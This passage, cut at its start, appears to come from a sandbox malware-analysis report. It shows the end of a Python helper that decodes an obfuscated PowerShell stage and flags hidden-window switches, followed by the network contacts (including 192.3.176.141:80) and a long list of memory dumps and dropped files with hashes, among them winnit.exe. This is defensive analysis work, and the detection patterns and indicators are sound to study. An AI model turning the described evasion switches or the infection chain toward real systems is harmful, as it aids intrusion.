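        hits.append("WindowStyle Hidden")  # numeric 1 is ProcessWindowStyle.Hidden
    if re.search(r"devicecredentialdeployment", cmdline, re.IGNORECASE):
        hits.append("DeviceCredentialDeployment (hides the console window)")
    return hits


if __name__ == "__main__":
    inner, stage = decode_stage(SAMPLE_ARG)
    print("inner iex string:", inner)
    print("decoded stage   :", stage)
    print("switches        :", evasion_switches(SAMPLE_ARG))
```

The same two functions apply unchanged to the real command line once the blob is recovered from the HTA or from a process-creation log, because the obfuscation is purely lexical: random casing never changes PowerShell's case-insensitive parsing, and the [char] casts only ever produce `::` and `"`. What comes out of decode_stage is the next script to analyse, not the final payload; in this report that script is what goes on to drop winnit.exe.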

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/3064-0-0x000000007124E000-0x000000007124F000-memory.dmp

memory/3064-1-0x0000000004A00000-0x0000000004A36000-memory.dmp

memory/3064-2-0x0000000005070000-0x0000000005698000-memory.dmp

memory/3064-3-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-4-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-5-0x0000000004FE0000-0x0000000005002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdoxc524.1cc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3064-7-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/3064-6-0x0000000005900000-0x0000000005966000-memory.dmp

memory/3064-17-0x0000000005AE0000-0x0000000005E34000-memory.dmp

memory/3064-18-0x0000000004CF0000-0x0000000004D0E000-memory.dmp

memory/3064-19-0x0000000005FE0000-0x000000000602C000-memory.dmp

memory/4500-29-0x0000000007430000-0x0000000007462000-memory.dmp

memory/4500-30-0x000000006DB00000-0x000000006DB4C000-memory.dmp

memory/4500-40-0x00000000073F0000-0x000000000740E000-memory.dmp

memory/4500-41-0x0000000007470000-0x0000000007513000-memory.dmp

memory/4500-42-0x0000000007BF0000-0x000000000826A000-memory.dmp

memory/4500-43-0x00000000075B0000-0x00000000075CA000-memory.dmp

memory/4500-44-0x0000000007610000-0x000000000761A000-memory.dmp

memory/4500-45-0x0000000007840000-0x00000000078D6000-memory.dmp

memory/4500-46-0x00000000077B0000-0x00000000077C1000-memory.dmp

memory/4500-47-0x00000000077E0000-0x00000000077EE000-memory.dmp

memory/4500-48-0x00000000077F0000-0x0000000007804000-memory.dmp

memory/4500-49-0x0000000007900000-0x000000000791A000-memory.dmp

memory/4500-50-0x0000000007830000-0x0000000007838000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.cmdline

MD5 f3cfa86992985a2642454cd9d42e01cb
SHA1 669931cedfed3976aadd15489db435b4961f4aa3
SHA256 2089b075b787020fbe1edaef8ca6988d6514d12496946bcb9fd33a00c15ea9e2
SHA512 ef95f81562e3df6936c54cc840a459b5c02e8aa6920e5e2e587646c8c42c60a050343f10214acd754dc2bdbd074bc917243fbfbbe0f24192bc8bff666ed1bf6a

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\CSC2F2BB2682638407FB6CE27D663A9546B.TMP

MD5 89eacbb3356343c2512f76d4fcb9b5f3
SHA1 2cd2057d5d7e233fa46b7ae04d130efb03dce2b7
SHA256 efad95b8e2f4d57a4a9a8589cf72b24e86269ad46e8f438af556dae76035634b
SHA512 bb38816368a265f44525fbc037d7b45ac4d0ffb08f05a110d2b3fb311a255be18c2d3e8defb8be8f2a1e4de177970d23e125f2575a2f7781596fe8226e46cf40

C:\Users\Admin\AppData\Local\Temp\RES9913.tmp

MD5 b31be863e2e93abda967e59ca7623657
SHA1 e61209adaf0658b64ed522b6531c7aad9fecc3c3
SHA256 4e68f835eba05b70f154a32a6dd96a96e686b27744fb033734ce08e723fbd6ef
SHA512 5fa35e09f8f469b38b8c95ecea68152606a0870c360cd367a591082287b5319195e14e4e669125004ec69f5d46615be9b4b990491221132b06fd0bb03cf7d2c0

C:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.dll

MD5 aace8def1a3eeb5aaf77c1a12a7b5499
SHA1 45c55d71da9b52a823bf60923e25cc83b6a80ba9
SHA256 7a1e6dcf93852f382c22b7403515686c54d6d200ee009a2583b04a11e091fe07
SHA512 fd676b18f10a532019f8adb9cc4f65a325b7ec655042503aa09c58330bcc0f3849ae3ba443db7cdb05e81df97eebad5709e4bd9f25c8e39cfddfe29a1d31c1a7

memory/3064-65-0x0000000006560000-0x0000000006568000-memory.dmp

memory/3064-71-0x000000007124E000-0x000000007124F000-memory.dmp

memory/3064-72-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-73-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-74-0x0000000007380000-0x00000000073A2000-memory.dmp

memory/3064-75-0x0000000008280000-0x0000000008824000-memory.dmp

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/4280-88-0x0000000000BC0000-0x0000000000DCD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERsHeLl.eXe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6723982b84296942dfede67b68abdab
SHA1 50a7f7b4e9dadadb6d011e1cf784508ee58d7340
SHA256 64c89973630b26c76275853928199844e76fa4b5775949889f3b129fac6d58b4
SHA512 56f855ea1eb94efd5a54759e728c95fd0a7010d016ec0d933e9f70f2d855706a2b57d986abb62f96c815b2e1be1c7a39f867c6b913dd9f4aa63d280906b88764

memory/3064-90-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/784-92-0x0000000000400000-0x0000000000446000-memory.dmp

memory/784-93-0x0000000000400000-0x0000000000446000-memory.dmp

memory/784-96-0x0000000002F30000-0x0000000002F84000-memory.dmp

memory/4280-95-0x0000000000BC0000-0x0000000000DCD000-memory.dmp

memory/784-97-0x0000000005450000-0x00000000054A2000-memory.dmp

memory/784-147-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-129-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-113-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-98-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-159-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-157-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-155-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-153-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-151-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-149-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-145-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-143-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-141-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-139-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-137-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-135-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-133-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-131-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-127-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-125-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-123-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-121-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-119-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-118-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-116-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-111-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-109-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-108-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-105-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-103-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-101-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-99-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-1128-0x0000000006580000-0x00000000065D0000-memory.dmp

memory/784-1129-0x0000000006670000-0x0000000006702000-memory.dmp

memory/784-1130-0x00000000065F0000-0x00000000065FA000-memory.dmp